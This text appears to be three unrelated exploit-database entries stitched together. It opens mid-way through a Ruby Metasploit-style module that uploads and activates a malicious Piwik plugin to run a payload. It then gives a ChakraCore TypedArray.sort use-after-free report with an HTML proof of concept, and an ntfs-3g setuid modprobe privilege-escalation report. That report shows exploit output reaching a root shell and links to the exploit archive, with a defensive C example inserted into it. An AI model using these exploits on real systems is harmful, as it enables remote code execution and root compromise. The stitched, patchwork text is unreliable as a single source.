      fail_with(Failure::NoAccess, "Looks like user #{username} has no superuser access")
    end

    print_status('Trying to get Piwik version')
    piwik_version = get_piwik_version(cookies)
    if piwik_version.nil?
      print_warning('Unable to detect Piwik version. Trying to continue.')
    else
      print_good("Detected Piwik version #{piwik_version}")
    end

    if piwik_version == '1.x'
      fail_with(Failure::NoTarget, 'Piwik version 1 is not supported by this module')
    end

    # Only versions after 3 have a separate Marketplace plugin
    if piwik_version && Gem::Version.new(piwik_version) >= Gem::Version.new('3')
      marketplace_available = true
    else
      marketplace_available = false
    end

    if marketplace_available
      print_status("Checking if Marketplace plugin is active")
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalized_index,
        'cookie' => cookies,
        'vars_get' => {
          'module' => 'Marketplace',
          'action' => 'index'
        }
      })
      fail_with(Failure::UnexpectedReply, 'Can not check for Marketplace plugin') unless res
      if res.code == 200 && res.body =~ /The plugin Marketplace is not enabled/
        print_status('Marketplace plugin is not enabled, trying to enable it')
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalized_index,
          'cookie' => cookies,
          'vars_get' => {
            'module' => 'CorePluginsAdmin',
            'action' => 'plugins'
          }
        })
        mp_activate_nonce = nil
        if res && res.code == 200
          match = res.body.match(/<a href=['"]index\.php\?module=CorePluginsAdmin&action=activate&pluginName=Marketplace&nonce=(\w+).*['"]>/)
          if match
            mp_activate_nonce = match[1]
          end
        end
        fail_with(Failure::UnexpectedReply, 'Can not extract Marketplace activate CSRF token') unless mp_activate_nonce
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalized_index,
          'cookie' => cookies,
          'vars_get' => {
            'module' => 'CorePluginsAdmin',
            'action' => 'activate',
            'pluginName' => 'Marketplace',
            'nonce' => "#{mp_activate_nonce}"
          }
        })
        if res && res.redirect?
          print_good('Marketplace plugin enabled')
        else
          fail_with(Failure::UnexpectedReply, 'Can not enable Marketplace plugin. Please try to manually enable it.')
        end
      else
        print_good('Seems like the Marketplace plugin is already enabled')
      end
    end

    print_status('Generating plugin')
    plugin_name = Rex::Text.rand_text_alpha(10)
    zip = generate_plugin(plugin_name)
    print_good("Plugin #{plugin_name} generated")

    print_status('Uploading plugin')
    # newer Piwik versions have a separate Marketplace plugin
    if marketplace_available
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalized_index,
        'cookie' => cookies,
        'vars_get' => {
          'module' => 'Marketplace',
          'action' => 'overview'
        }
      })
    else
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalized_index,
        'cookie' => cookies,
        'vars_get' => {
          'module' => 'CorePluginsAdmin',
          'action' => 'marketplace'
        }
      })
    end
    upload_nonce = nil
    if res && res.code == 200
      match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m)
      if match
        upload_nonce = match[1]
      end
    end
    fail_with(Failure::UnexpectedReply, 'Can not extract upload CSRF token') if upload_nonce.nil?

    # plugin files to delete after getting our session
    register_files_for_cleanup("plugins/#{plugin_name}/plugin.json")
    register_files_for_cleanup("plugins/#{plugin_name}/#{plugin_name}.php")

    data = Rex::MIME::Message.new
    data.add_part(zip, 'application/zip', 'binary', "form-data; name=\"pluginZip\"; filename=\"#{plugin_name}.zip\"")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalized_index,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s,
      'cookie' => cookies,
      'vars_get' => {
        'module' => 'CorePluginsAdmin',
        'action' => 'uploadPlugin',
        'nonce' => "#{upload_nonce}"
      }
    )
    activate_nonce = nil
    if res && res.code == 200
      match = res.body.match(/<a.*href="index.php\?module=CorePluginsAdmin&action=activate.+nonce=([^&]+)/)
      if match
        activate_nonce = match[1]
      end
    end
    fail_with(Failure::UnexpectedReply, 'Can not extract activate CSRF token') if activate_nonce.nil?

    print_status('Activating plugin and triggering payload')
    # Activation runs the plugin's install() hook; short timeout since the payload may not return.
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalized_index,
      'cookie' => cookies,
      'vars_get' => {
        'module' => 'CorePluginsAdmin',
        'action' => 'activate',
        'nonce' => "#{activate_nonce}",
        'pluginName' => "#{plugin_name}"
      }
    }, 5)
  end
end
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=983
There is a use-after-free in TypedArray.sort. In TypedArrayCompareElementsHelper (https://chromium.googlesource.com/external/github.com/Microsoft/ChakraCore/+/TimeTravelDebugging/lib/Runtime/Library/TypedArray.cpp), the comparison function is called with the following code:
Var retVal = CALL_FUNCTION(compFn, CallInfo(CallFlags_Value, 3),
    undefined,
    JavascriptNumber::ToVarWithCheck((double)x, scriptContext),
    JavascriptNumber::ToVarWithCheck((double)y, scriptContext));

Assert(TypedArrayBase::Is(contextArray[0]));
if (TypedArrayBase::IsDetachedTypedArray(contextArray[0]))
{
    JavascriptError::ThrowTypeError(scriptContext, JSERR_DetachedTypedArray, _u("[TypedArray].prototype.sort"));
}

if (TaggedInt::Is(retVal))
{
    return TaggedInt::ToInt32(retVal);
}

if (JavascriptNumber::Is_NoTaggedIntCheck(retVal))
{
    dblResult = JavascriptNumber::GetValue(retVal);
}
else
{
    dblResult = JavascriptConversion::ToNumber_Full(retVal, scriptContext);
}
The TypedArray is checked to see whether it has been detached, but only afterwards is the comparison function's return value converted to an integer, a conversion that can invoke valueOf. If that function detaches the TypedArray, one swap is performed on the buffer after it has been freed.
A minimal PoC is as follows, and a full PoC is attached.
var buf = new ArrayBuffer(0x10010);
var numbers = new Uint8Array(buf);

function v() {
    postMessage("test", "http://127.0.0.1", [buf]);
    return 7;
}

function compareNumbers(a, b) {
    return {valueOf : v};
}

numbers.sort(compareNumbers);
This PoC works on 64-bit systems only.
-->
<html>
<body>
<script>
var buf = new ArrayBuffer(0x10010);
var numbers = new Uint8Array(buf);
var first = 0;

function v() {
    alert("in v");
    if (first == 0) {
        postMessage("test", "http://127.0.0.1", [buf]);
        first++;
    }
    return 7;
}

function compareNumbers(a, b) {
    alert("in func");
    return {valueOf : v};
}

try {
    numbers.sort(compareNumbers);
} catch (e) {
    alert(e.message);
}
</script>
</body>
</html>
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
ntfs-3g is installed by default e.g. on Ubuntu and comes with a
setuid root program /bin/ntfs-3g. When this program is invoked on a
system whose kernel does not support FUSE filesystems (detected by
get_fuse_fstype()), ntfs-3g attempts to load the "fuse" module using
/sbin/modprobe via load_fuse_module().
The issue is that /sbin/modprobe is not designed to run in a setuid
context. As the manpage of modprobe explicitly points out:
The MODPROBE_OPTIONS environment variable can also be used
to pass arguments to modprobe.
Therefore, on a system that does not seem to support FUSE filesystems,
an attacker can set the environment variable MODPROBE_OPTIONS to
something like "-C /tmp/evil_config -d /tmp/evil_root" to force
modprobe to load its configuration and the module from
attacker-controlled directories. This allows a local attacker to load
arbitrary code into the kernel.
In practice, the FUSE module is usually already loaded. However, the
issue can still be attacked because a failure to open
/proc/filesystems (meaning that get_fuse_fstype() returns
FSTYPE_UNKNOWN) always causes modprobe to be executed, even if the
FUSE module is already loaded. An attacker can cause an attempt to
open /proc/filesystems to fail by exhausting the global limit on the
number of open file descriptions (/proc/sys/fs/file-max).
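Two defensive checks follow from the report: a failed read of /proc/filesystems must not be treated as "FUSE is absent", and a setuid program must not let inherited variables such as MODPROBE_OPTIONS reach modprobe. The code below is an added example, not ntfs-3g's code: FSTYPE_UNKNOWN is the name the report uses, the other enum values and all function names are ours, and the /proc/filesystems contents are constructed.

```c
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Outcome of probing /proc/filesystems. FSTYPE_UNKNOWN (the report's name)
 * means the file could not be read at all; the other two names are assumed. */
enum fuse_fstype { FSTYPE_UNKNOWN = -1, FSTYPE_NONE = 0, FSTYPE_FUSE = 1 };

/* Classifies the *contents* of /proc/filesystems, passed in as a string so the
 * logic can be exercised offline. NULL stands for a failed open()/read(). */
enum fuse_fstype fuse_fstype_from_contents(const char *contents) {
    if (contents == NULL)
        return FSTYPE_UNKNOWN;           /* read failed: we learned nothing */
    const char *p = contents;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        /* each line is "[nodev]\t<name>"; the filesystem name is the last token */
        const char *tab = memchr(p, '\t', len);
        const char *name = tab ? tab + 1 : p;
        size_t nlen = len - (size_t)(name - p);
        if (nlen == 4 && memcmp(name, "fuse", 4) == 0)
            return FSTYPE_FUSE;
        if (!eol) break;
        p = eol + 1;
    }
    return FSTYPE_NONE;                  /* file read fine and lists no fuse entry */
}

/* First point from the report: only a *definite* "fuse is absent" answer should
 * lead to a module load. An unreadable /proc/filesystems (for example because
 * the ENFILE limit was hit) must not, since the module is most likely present. */
int should_try_modprobe(enum fuse_fstype t) {
    return t == FSTYPE_NONE;
}

/* Second point: modprobe honours MODPROBE_OPTIONS, so a setuid caller must not
 * pass its inherited environment through. Builds a fresh envp from scratch
 * holding only a fixed PATH; the caller hands it to execve() and frees it. */
char **clean_helper_env(void) {
    char **env = calloc(2, sizeof *env);
    if (!env) return NULL;
    env[0] = "PATH=/sbin:/usr/sbin:/bin:/usr/bin";
    env[1] = NULL;
    return env;
}

/* True when no variable named `name` is present in envp. */
int env_lacks(char *const *env, const char *name) {
    size_t n = strlen(name);
    for (; *env; env++)
        if (strncmp(*env, name, n) == 0 && (*env)[n] == '=')
            return 0;
    return 1;
}

/* Convenience check: the helper env drops MODPROBE_OPTIONS but still has PATH. */
int helper_env_is_clean(void) {
    char **env = clean_helper_env();
    if (!env) return 0;
    int ok = env_lacks(env, "MODPROBE_OPTIONS") && !env_lacks(env, "PATH");
    free(env);
    return ok;
}

/* Constructed samples of /proc/filesystems output. */
static const char sample_with_fuse[] =
    "nodev\tsysfs\n"
    "nodev\tproc\n"
    "\text4\n"
    "nodev\tfuse\n"
    "\tfuseblk\n";
static const char sample_without_fuse[] =
    "nodev\tsysfs\n"
    "\text4\n";

int main(void) {
    printf("fuse listed    -> run modprobe? %d\n", should_try_modprobe(fuse_fstype_from_contents(sample_with_fuse)));
    printf("fuse missing   -> run modprobe? %d\n", should_try_modprobe(fuse_fstype_from_contents(sample_without_fuse)));
    printf("open() failed  -> run modprobe? %d\n", should_try_modprobe(fuse_fstype_from_contents(NULL)));
    printf("helper env clean: %d\n", helper_env_is_clean());
    return 0;
}
```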
I have attached an exploit for the issue. I have tested it in a VM
with Ubuntu Server 16.10. To reproduce, unpack the attached file,
compile the exploit and run it:
user@ubuntu:~$ tar xf ntfs-3g-modprobe-unsafe.tar
user@ubuntu:~$ cd ntfs-3g-modprobe-unsafe/
user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.8.0-32-generic'
CC [M] /home/user/ntfs-3g-modprobe-unsafe/rootmod.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/user/ntfs-3g-modprobe-unsafe/rootmod.mod.o
LD [M] /home/user/ntfs-3g-modprobe-unsafe/rootmod.ko
make: Leaving directory '/usr/src/linux-headers-4.8.0-32-generic'
depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.order: No such file or directory
depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.builtin: No such file or directory
user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./sploit
looks like we won the race
got ENFILE at 198088 total
Failed to open /proc/filesystems: Too many open files in system
yay, modprobe ran!
modprobe: ERROR: ../libkmod/libkmod.c:514 lookup_builtin_file() could not open builtin file '/tmp/ntfs_sploit.u48sGO/lib/modules/4.8.0-32-generic/modules.builtin.bin'
modprobe: ERROR: could not insert 'rootmod': Too many levels of symbolic links
Error opening '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
Failed to mount '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
we have root privs now...
root@ubuntu:~/ntfs-3g-modprobe-unsafe# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lxd),123(libvirt),127(sambashare),128(lpadmin),1000(user)
Note: The exploit seems to work relatively reliably in VMs with
multiple CPU cores, but not in VMs with a single CPU core. If you
test this exploit in a VM, please ensure that the VM has at least two
CPU cores.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip